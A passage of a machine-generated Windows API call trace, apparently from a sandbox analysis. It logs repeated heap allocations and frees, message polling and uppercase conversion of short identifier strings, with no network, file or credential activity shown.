Size=0x40) returned 0x248d8e8 [0161.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.608] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.609] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.609] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0161.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0161.612] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0161.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0161.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0161.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0161.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0161.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.615] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.619] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0161.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.620] RtlAllocateHeap 